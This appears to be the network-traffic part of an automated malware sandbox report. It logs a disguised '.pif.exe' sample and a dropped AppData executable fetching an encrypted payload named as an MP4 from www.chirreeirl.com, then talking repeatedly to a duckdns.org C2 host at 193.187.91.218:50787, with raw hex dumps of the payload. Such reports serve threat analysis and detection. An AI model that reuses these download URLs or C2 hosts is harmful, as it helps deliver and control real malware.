                                                        Jan 9, 2025 18:59:42.165716887 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:42.219305038 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:59:42.346220016 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:42.351675034 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:59:42.356497049 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:42.356849909 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:59:42.361593008 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:47.453883886 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:59:47.458863020 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:47.458921909 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:59:47.463711023 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:47.915635109 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:47.969671011 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:59:48.095488071 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:48.103292942 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:59:48.108110905 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 18:59:48.108282089 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 18:59:48.113069057 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:03.602830887 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:03.656697035 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:03.783185959 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:03.829174995 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:08.080459118 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:08.085371971 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:08.085481882 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:08.285518885 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:08.524713039 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:08.579830885 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:08.781141996 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:08.781187057 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:08.781241894 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:08.783330917 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:08.788151979 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:08.788228989 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:08.793003082 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:09.610591888 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:09.615464926 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:09.615545988 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:09.620321035 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:10.038086891 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:10.078608036 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:10.236304045 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:10.244309902 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:10.249130964 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:10.251979113 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:10.256788015 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:21.922934055 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:21.927817106 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:21.927921057 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:21.932672977 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:22.345355988 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:22.391335011 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:22.517738104 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:22.521718979 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:22.526614904 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:22.526724100 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:22.531558037 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:27.141671896 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:27.146672010 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:27.146722078 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:27.151530981 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:27.580286980 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:27.625785112 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:27.752571106 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:27.757972956 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:27.762798071 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:27.763341904 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:27.768129110 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:37.610044956 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:37.658073902 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:37.784883022 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:37.828824043 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:50.152158976 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:50.157047033 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:50.157125950 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:50.161957026 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:50.717637062 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:50.776798010 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:50.776921988 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:50.781734943 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:50.787178993 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:50.787259102 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:50.792618990 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:58.423043966 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:58.428363085 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:58.430630922 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:58.435453892 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:58.941752911 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:59.000313044 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:59.131656885 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:59.172718048 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:59.943339109 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:59.950299978 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:00:59.950439930 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:00:59.957551003 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:01:00.390357971 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:01:00.438484907 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:01:00.566523075 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:01:00.567349911 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:01:00.572174072 CET5078749710193.187.91.218192.168.2.5
                                                        Jan 9, 2025 19:01:00.572297096 CET4971050787192.168.2.5193.187.91.218
                                                        Jan 9, 2025 19:01:00.577156067 CET5078749710193.187.91.218192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 9, 2025 18:56:53.150109053 CET6026853192.168.2.51.1.1.1
                                                        Jan 9, 2025 18:56:53.782155991 CET53602681.1.1.1192.168.2.5
                                                        Jan 9, 2025 18:57:12.627413034 CET6002053192.168.2.51.1.1.1
                                                        Jan 9, 2025 18:57:12.733664036 CET53600201.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 9, 2025 18:56:53.150109053 CET192.168.2.51.1.1.10x64f8Standard query (0)www.chirreeirl.comA (IP address)IN (0x0001)false
                                                        Jan 9, 2025 18:57:12.627413034 CET192.168.2.51.1.1.10x9ad0Standard query (0)pureeratee.duckdns.orgA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 9, 2025 18:56:53.782155991 CET1.1.1.1192.168.2.50x64f8No error (0)www.chirreeirl.comchirreeirl.comCNAME (Canonical name)IN (0x0001)false
                                                        Jan 9, 2025 18:56:53.782155991 CET1.1.1.1192.168.2.50x64f8No error (0)chirreeirl.com209.58.149.225A (IP address)IN (0x0001)false
                                                        Jan 9, 2025 18:57:12.733664036 CET1.1.1.1192.168.2.50x9ad0No error (0)pureeratee.duckdns.org193.187.91.218A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.chirreeirl.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549704209.58.149.2254433668C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-09 17:56:54 UTC220OUTGET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                        Host: www.chirreeirl.com
                                                        Connection: Keep-Alive
                                                        2025-01-09 17:56:54 UTC209INHTTP/1.1 200 OK
                                                        Date: Thu, 09 Jan 2025 17:56:54 GMT
                                                        Server: Apache
                                                        Last-Modified: Fri, 03 Jan 2025 12:37:34 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260040
                                                        Connection: close
                                                        Content-Type: video/mp4
                                                        2025-01-09 17:56:54 UTC7983INData Raw: ca 20 ef 75 c7 15 32 30 87 a8 15 24 29 fa 4b e9 bf 0c 84 b6 85 ca f7 02 a1 01 d8 63 50 e8 46 4a 90 09 2c ef 47 86 63 53 b3 10 00 17 c2 d0 e4 51 c1 39 10 93 e1 e6 f0 62 cf 4d 2b 62 bf 98 5f 60 91 5e 81 e0 94 ae eb 5f e0 0b 14 8a 51 cc 45 d3 f7 07 ec 8a 25 35 67 04 c2 4a ef 0e 4c 4b 43 b3 2a d1 81 ed 20 a3 ed c1 27 6b 82 eb 24 b6 0c 25 bf df 2f 35 63 50 a7 dc 2b d3 ee bb bf 0c bd 42 a7 14 2f 32 0f fc 8e 38 07 a5 43 8b c7 3c fa c4 97 53 22 c6 3d f4 f4 a3 a4 d6 2d 88 73 7c 7c 25 d8 e7 bd e8 b0 82 ca a4 8c e8 73 e1 77 12 e3 ac 43 74 f4 4a 73 64 37 51 41 2f b7 a7 8e cc e4 27 9c 00 18 76 c9 17 eb 32 fc 61 03 88 cd 5f ce cf 54 86 b1 1d 0d b7 dc fd db 49 ec 2f 53 b2 64 33 1d 44 d3 42 9e 57 a9 51 4f b8 e2 6e 0d 01 dd 15 14 14 87 a0 3f ca 94 2c 59 d0 7e 9d 12 4f 02
                                                        Data Ascii: u20$)KcPFJ,GcSQ9bM+b_`^_QE%5gJLKC* 'k$%/5cP+B/28C<S"=-s||%swCtJsd7QA/'v2a_TI/Sd3DBWQOn?,Y~O
                                                        2025-01-09 17:56:54 UTC8000INData Raw: 0b eb 2f 8d f9 b9 cd f9 4c 18 4f 71 c7 39 d9 19 da f4 39 9b 25 91 f8 2a 01 81 f8 10 84 8d 46 9e 12 d3 62 f7 f6 42 19 42 69 3e 63 23 9c 55 44 dd bc d6 a5 22 c2 0e 3e ab 14 48 12 32 d3 4f 24 0a 6e 95 b5 55 07 da 4c b9 5c 4a f6 d8 ba e1 ee c6 64 2c cc 83 e1 57 33 32 7a 39 9f f6 4d 10 62 3f 7b fc 76 91 0d b2 1a f3 e3 8c 78 d3 8d fc 6d 54 fb 66 c1 aa 4c e4 ad 3b 69 5d aa 56 dc 22 79 a1 be 79 09 a9 7b d7 90 0d 38 97 d3 f6 f5 88 c9 cf 7b 89 38 cf 9a df e7 5d 50 31 a1 a4 8f 11 32 bb 9a 50 d1 74 54 9e 77 96 ff 46 eb 7c 3f 5f ee 77 09 e1 1a 00 f0 bf ab 8d 1e 77 a6 40 d0 0d 81 44 46 92 9d b2 a0 d1 fb 0e 78 b9 62 51 4d ba d9 d9 7f 33 35 e4 69 3b 3d 12 af df b4 1d e8 37 27 8b b8 4c 86 93 7b 5a 70 1a d0 35 54 6e 39 f2 87 07 16 19 ce 54 fb 36 a4 64 50 4a c5 bb d3 9e 6e
                                                        Data Ascii: /LOq99%*FbBBi>c#UD">H2O$nUL\Jd,W32z9Mb?{vxmTfL;i]V"yy{8{8]P12PtTwF|?_ww@DFxbQM35i;=7'L{Zp5Tn9T6dPJn
                                                        2025-01-09 17:56:54 UTC8000INData Raw: 2a 3a c6 a9 a4 a6 03 f5 e2 d3 7e 3c f5 95 1d d1 b8 54 ec a0 54 49 dd d6 59 7c b2 3c d1 04 e5 94 77 e3 89 c2 69 70 b4 39 03 c8 72 e9 89 d2 ed 17 fb 45 a3 68 e8 e0 98 11 cb 17 68 0f 0e a7 e0 2d 5b 52 f8 ff f2 4d d7 95 12 3d 35 34 bb 04 cb 56 f5 81 c8 58 07 2d 4e c9 a9 45 84 45 8d 35 d8 63 2b ec 9d 1e ed e7 b8 a8 99 17 ed 19 81 5e 35 6d 9a c5 70 4d 9a b1 66 db b0 61 b6 83 18 4d bd eb 21 1d 16 83 37 9d 7f af 88 55 7b 78 f4 a3 7a c6 d6 11 4d 07 15 61 a8 c2 6e a4 57 7f 45 80 ce 37 fe 34 af 99 23 70 e8 23 79 84 f7 ae 97 23 9e a9 94 43 a7 66 e3 78 1b 01 ec 9a ae 9d 2b 38 49 1d 0e 25 83 a2 d2 41 eb 5a f8 fc a8 b4 45 82 2b 98 fc 4a 0d 6c 8b c4 9a 9c 38 d8 e5 01 a7 54 72 39 a3 89 2e 30 27 d6 ee df b9 06 d8 60 b4 e2 56 08 aa 92 8d f2 8d 33 fd e0 b3 0f a8 dd ff be f1
                                                        Data Ascii: *:~<TTIY|<wip9rEhh-[RM=54VX-NEE5c+^5mpMfaM!7U{xzManWE74#p#y#Cfx+8I%AZE+Jl8Tr9.0'`V3
                                                        2025-01-09 17:56:54 UTC8000INData Raw: bd b0 8e c4 d2 2b 47 bf b5 9b 5d 86 f3 63 6e d8 44 2d e1 64 6e cf 11 57 b5 3a de 6e 96 4b 0d fc 83 dd ef 37 a6 d7 21 10 a2 95 35 94 b1 7a 06 28 8a 8a d9 11 41 a7 2e b1 90 98 52 a8 c5 76 8d 89 9b 0e 13 9e 0f 22 f5 be d1 f3 2a 6f 41 1a 28 9d 77 3d aa cc f4 f3 2e e4 fe e7 bb 49 be 64 34 25 dd 6b 31 8b 93 16 b1 04 c7 c7 5a ba 3f b8 bd b4 33 0c e1 5b 17 95 4e b8 26 86 8a 04 e1 5e 2b fa 3a ab fb d6 be 92 0c d7 12 1f 82 52 30 5f fe 0b 06 ba 11 84 dc 00 8e 23 bc 40 b8 51 fa 2d 51 66 9e 7c e5 69 f5 dc 2f 27 f1 0a d1 3a 89 2d 5e b4 8e 2d 20 a1 34 2f f8 a2 8b a5 1e e6 9f 7a d4 1e f1 2e c9 b1 d4 8d 6c 49 aa 61 95 23 86 5d 76 90 f4 57 1b f4 a5 69 5c 4f 94 7f 41 c8 80 43 8a e1 80 05 9d 9b 6b bb cd d9 00 d4 bb b7 1c 50 bc 98 44 a8 0e e4 31 9e 53 56 33 3b 22 99 e9 ac 8c
                                                        Data Ascii: +G]cnD-dnW:nK7!5z(A.Rv"*oA(w=.Id4%k1Z?3[N&^+:R0_#@Q-Qf|i/':-^- 4/z.lIa#]vWi\OACkPD1SV3;"
                                                        2025-01-09 17:56:54 UTC8000INData Raw: 18 5f 26 38 49 d3 8b 55 7a a8 63 80 c7 a2 a8 27 3b df 2a f2 34 17 65 52 b6 c3 26 44 af 3e 62 97 cf e3 9c 52 14 26 d9 94 f5 aa d1 e3 e7 90 9d 4a 4f a5 aa b9 3b 28 e7 c5 c8 78 be 58 10 07 29 00 6e 8f 5a 5e 70 fd ec a0 94 43 82 02 b8 81 1e bd a7 ea 51 67 d7 5e 88 8f bc a8 c3 01 2b 24 e6 77 86 27 b1 90 49 a2 4b 9d fa c8 b3 40 23 c0 7d fa b7 1b c6 67 01 67 fb 0b 83 6a cd e9 bb 37 a9 23 df 66 42 3b 93 f5 28 d8 45 62 fe 52 85 a3 d3 db 37 d6 21 d6 5b 6a 7f c5 62 39 fc 92 9c a1 92 e2 4f fa 08 4e ab e6 9b 29 ca 3b b5 d6 af 1e 01 6f 56 7d a7 a6 e6 7a 9a 7c 46 e4 53 87 96 bf ea 6e 31 1c 95 c3 ec 5c 43 e0 8e 3c 50 ee 5a c0 38 21 c7 7f 0a 21 3c f9 f7 8a 74 86 24 b5 7a b2 e3 e1 0c e2 85 d1 5d 48 35 4e e1 4d 3b 2b bc 11 74 3a 16 ff 16 43 87 66 18 47 01 59 b3 50 94 f5 39
                                                        Data Ascii: _&8IUzc';*4eR&D>bR&JO;(xX)nZ^pCQg^+$w'IK@#}ggj7#fB;(EbR7![jb9ON);oV}z|FSn1\C<PZ8!!<t$z]H5NM;+t:CfGYP9
                                                        2025-01-09 17:56:54 UTC8000INData Raw: 44 28 d8 9f ab ef c5 71 cc 06 e3 6c 19 d5 ea eb 36 7b e3 73 8c 64 8a 12 35 34 fb 20 3e 93 4c 51 73 83 e0 57 58 af 57 94 97 30 73 b2 24 02 93 06 ee 29 5a ce 7b a4 7e d5 41 fc 7e 46 98 69 6d 44 8c 87 c0 ef 99 54 57 0c 8f a3 c6 de 96 b4 d9 be 2e 70 f4 b2 5e 31 92 af ce 51 ca 56 1b 58 bc 6f 05 63 ee 7e 6c 86 d8 7d ff b5 a9 59 5e 5a ef ac 6e 3f ab 88 95 ed e5 7f f0 39 64 83 fc d4 a8 c1 43 8e 4d c9 b2 01 59 96 fd ad 84 ad 9f 09 98 17 e6 6b 01 f3 1d 7e b8 d9 90 60 28 58 c2 f1 d0 49 da 69 b7 0f 74 8c 80 e9 d7 a5 97 8d 73 ff 22 f3 40 e6 59 ff 43 87 f4 98 68 6b f1 72 07 b2 40 3e 55 3c c9 c4 54 87 30 c5 c6 16 be 13 c9 0e f5 bf dd 68 f9 3a d0 5f 8b ea 1c c8 b5 a3 32 b2 34 82 6a 8e c4 d7 4b ce 3f fb 1a e5 dc d5 34 cd 20 cf e6 bb e4 96 3d ff 51 67 61 29 47 ed b0 79 40
                                                        Data Ascii: D(ql6{sd54 >LQsWXW0s$)Z{~A~FimDTW.p^1QVXoc~l}Y^Zn?9dCMYk~`(XIits"@YChkr@>U<T0h:_24jK?4 =Qga)Gy@
                                                        2025-01-09 17:56:54 UTC8000INData Raw: 72 0c fb b9 d0 de fe 67 3d 5d c1 1e 31 bb 59 c8 74 26 3d 54 6f 6c df 06 1e 01 19 a3 4f f0 19 68 39 3d 19 18 df 9a 0f dd 05 7b c9 a9 b4 0f 9c 10 6d 14 1d 95 2f c0 1e 17 ef 20 5e d7 87 0f df 78 ed 5b 47 2c ad f4 31 97 87 f0 c3 b3 21 e4 da 51 bd 97 25 e4 d5 85 6f f0 3e e6 73 33 62 27 b4 cf 70 71 78 79 bd 87 0e 10 f5 88 61 c1 ce 9b 68 ab 4a a3 c0 ed 2f 4b 76 54 17 49 8f af 46 f2 17 af 51 c2 33 c7 5d e4 54 e5 0d 05 2d e7 9f 57 87 7d 29 a8 3d 57 87 ac 00 6a bd bc 3f d8 71 b0 93 77 bf 65 82 32 63 70 06 3a 3d e7 95 2e 40 a7 2d 42 a0 34 9c c9 5a 98 3d be 19 26 5d a4 e9 38 ee 06 d8 bc bd 91 f4 e3 ad 48 ff f2 03 2c 51 9a ad 67 c0 e0 74 b1 33 a5 38 16 4a e4 54 e3 97 fc 51 8e e7 be e3 10 18 bf 65 68 17 66 46 f2 f6 0e 63 ea 20 4f d1 4c 73 a3 39 6f 22 90 7c 81 6d e1 c1
                                                        Data Ascii: rg=]1Yt&=TolOh9={m/ ^x[G,1!Q%o>s3b'pqxyahJ/KvTIFQ3]T-W})=Wj?qwe2cp:=.@-B4Z=&]8H,Qgt38JTQehfFc OLs9o"|m
                                                        2025-01-09 17:56:54 UTC8000INData Raw: 31 34 73 09 6e 1d 20 25 f6 de 83 20 f0 72 d1 a0 79 f5 98 53 70 bf b0 a0 1d f7 3c 8f 1d 3d 9a 79 49 6c f1 d8 e9 50 65 70 e9 9c bd a4 2f 51 8c 79 75 60 22 18 bb 9e f3 c2 84 18 66 e8 ae 8a eb b6 1a b0 75 11 70 e0 a2 82 0f ce 14 3e 35 39 81 24 c0 10 1a 3c 5d 79 25 b4 a2 f1 a0 70 0b c4 52 de f8 f8 ae d5 99 0d 83 17 ff 63 22 e1 88 9d 63 ae 79 1d 2e 3e 9a 20 35 98 c5 45 b9 81 02 f7 76 a3 5e 90 03 60 44 ab a4 21 48 56 0a bd c1 f0 ce 99 70 de 3d 2c 57 b8 04 67 61 1e e6 65 1a f7 3d 91 95 7d 26 ef ad 59 e4 7d 84 ce 5d 50 9b f0 28 c2 dd 15 e1 97 67 52 00 c5 d5 44 61 9c 00 fe 91 63 d9 a9 2d a8 f4 d3 e3 c7 06 76 a9 a7 22 4e e2 9b bf 7b a7 49 b3 2a 17 ab 85 75 b7 42 d0 96 c2 db 71 d2 cb 42 5a 20 dc a9 d7 bc 12 83 a1 78 5f 3e bf 1b f1 5b da 0f 7b 0f c0 92 7d ec be 6d d7
                                                        Data Ascii: 14sn % rySp<=yIlPep/Qyu`"fup>59$<]y%pRc"cy.> 5Ev^`D!HVp=,Wgae=}&Y}]P(gRDac-v"N{I*uBqBZ x_>[{}m
                                                        2025-01-09 17:56:54 UTC8000INData Raw: e4 1d 1b 40 80 1b 40 3e 1e 3b 58 03 6b fd b4 2c 46 e8 1c e4 4f af 85 16 3b c4 05 a2 9f 7a 43 14 0b 9d 3a ec b3 31 9a 73 7b 89 20 8c 80 66 67 44 6a 79 75 ec 18 df d7 f8 b1 bc 71 a3 1b 8c f1 71 5a c0 f8 bc 0c ab 97 4d 86 e3 d0 d4 5c 3f 17 1a 76 f4 e6 05 bc 58 10 6a 7d 32 d0 dc 62 8b 07 ec 7e f8 1e a6 fb 67 4b a8 c5 1e ef ac b7 62 cf f1 8f 2f 40 d9 7a 22 b1 24 ed 17 63 bf 97 5a 49 3f 8a 8e 74 a6 5a c7 03 9b 6f 29 47 14 6b 18 de f1 b2 e1 84 55 94 de 62 fa 74 4f 02 5c 00 4e 81 b3 38 0e c4 f9 17 c6 b9 25 ac ec 8b a5 41 ec 79 39 fb a8 e1 ae 5c 47 46 9e bd d4 5b 1a 05 1b d3 31 a5 c4 3c dc 46 56 72 d6 b3 91 17 e0 0e 21 42 d6 ea b4 21 d5 5f 5d 2e a5 a4 b3 84 f0 6b e7 7c 8b b0 13 79 0c bc c2 95 e7 9e d1 cc 20 d3 ee 7e cf 79 b0 50 96 9b 68 90 f8 e0 cb ab 3b 64 7b 30
                                                        Data Ascii: @@>;Xk,FO;zC:1s{ fgDjyuqqZM\?vXj}2b~gKb/@z"$cZI?tZo)GkUbtO\N8%Ay9\GF[1<FVr!B!_].k|y ~yPh;d{0
                                                        2025-01-09 17:56:54 UTC8000INData Raw: 03 c0 d7 67 18 d9 87 53 4b 34 dc 3d a7 21 35 2c 34 ff d0 c2 b5 76 d3 d6 19 41 2f bf 3a a2 48 82 7f 7a 8b e6 c7 74 9a f5 31 4d c6 97 e1 49 0a 74 c9 7b cc 4b 4d f0 8a be f2 37 25 74 26 b3 99 f6 57 8d db 42 36 de 51 a8 59 4c a1 5a b4 a2 cf 3a 4d 1a 03 ef 7d 67 97 6a c1 dd 1c e9 b3 b0 27 92 b8 28 21 89 1a e8 2c 8e b2 72 35 55 09 2d 86 2e f8 65 54 db 8e 5e b7 e2 7c 38 36 68 2d a1 6a 65 dc 69 d9 89 cf 81 eb 8d 96 f3 3d cf 3e bd 1e 14 5c 2d e4 5c 9b 80 7d 3f 05 da 52 2e 52 fb f1 df e1 7f d0 31 ef b1 6b 0b ca 71 67 56 6f 9a 86 e5 aa b9 4e 51 f2 08 45 10 d5 ee 7e 28 3a 30 ce 8b da 21 fe 07 68 fd 11 3c 15 41 f2 92 b7 66 87 b1 c4 91 d6 9e f2 54 ed aa d4 26 f6 53 ea a9 ce 59 1a 36 ba e7 9e b9 a1 3b b5 ff 83 cd 31 e5 4e 30 b9 6a 51 c0 5d 47 b6 81 a6 41 03 c4 ef 23 58
                                                        Data Ascii: gSK4=!5,4vA/:Hzt1MIt{KM7%t&WB6QYLZ:M}gj'(!,r5U-.eT^|86h-jei=>\-\}?R.R1kqgVoNQE~(:0!h<AfT&SY6;1N0jQ]GA#X


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.549712209.58.149.2254432300C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-09 17:57:16 UTC220OUTGET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                        Host: www.chirreeirl.com
                                                        Connection: Keep-Alive
                                                        2025-01-09 17:57:16 UTC209INHTTP/1.1 200 OK
                                                        Date: Thu, 09 Jan 2025 17:57:16 GMT
                                                        Server: Apache
                                                        Last-Modified: Fri, 03 Jan 2025 12:37:34 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260040
                                                        Connection: close
                                                        Content-Type: video/mp4
                                                        2025-01-09 17:57:16 UTC7983INData Raw: ca 20 ef 75 c7 15 32 30 87 a8 15 24 29 fa 4b e9 bf 0c 84 b6 85 ca f7 02 a1 01 d8 63 50 e8 46 4a 90 09 2c ef 47 86 63 53 b3 10 00 17 c2 d0 e4 51 c1 39 10 93 e1 e6 f0 62 cf 4d 2b 62 bf 98 5f 60 91 5e 81 e0 94 ae eb 5f e0 0b 14 8a 51 cc 45 d3 f7 07 ec 8a 25 35 67 04 c2 4a ef 0e 4c 4b 43 b3 2a d1 81 ed 20 a3 ed c1 27 6b 82 eb 24 b6 0c 25 bf df 2f 35 63 50 a7 dc 2b d3 ee bb bf 0c bd 42 a7 14 2f 32 0f fc 8e 38 07 a5 43 8b c7 3c fa c4 97 53 22 c6 3d f4 f4 a3 a4 d6 2d 88 73 7c 7c 25 d8 e7 bd e8 b0 82 ca a4 8c e8 73 e1 77 12 e3 ac 43 74 f4 4a 73 64 37 51 41 2f b7 a7 8e cc e4 27 9c 00 18 76 c9 17 eb 32 fc 61 03 88 cd 5f ce cf 54 86 b1 1d 0d b7 dc fd db 49 ec 2f 53 b2 64 33 1d 44 d3 42 9e 57 a9 51 4f b8 e2 6e 0d 01 dd 15 14 14 87 a0 3f ca 94 2c 59 d0 7e 9d 12 4f 02
                                                        Data Ascii: u20$)KcPFJ,GcSQ9bM+b_`^_QE%5gJLKC* 'k$%/5cP+B/28C<S"=-s||%swCtJsd7QA/'v2a_TI/Sd3DBWQOn?,Y~O
